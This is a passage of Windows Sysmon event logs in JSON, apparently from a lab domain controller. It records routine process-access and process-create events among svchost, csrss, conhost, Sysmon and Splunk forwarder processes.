08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A1-5F25-0000-0010639B0900}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.945","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A1-5F25-0000-0010639B0900}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.399\r\nProcessGuid: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nProcessId: 4612\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.399","ProcessGuid":"{41C8662E-21A3-5F25-0000-0010649D0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A3-5F25-0000-0010649D0900}","TargetProcessId":"4612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A3-5F25-0000-0010649D0900}","TargetProcessId":"4612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 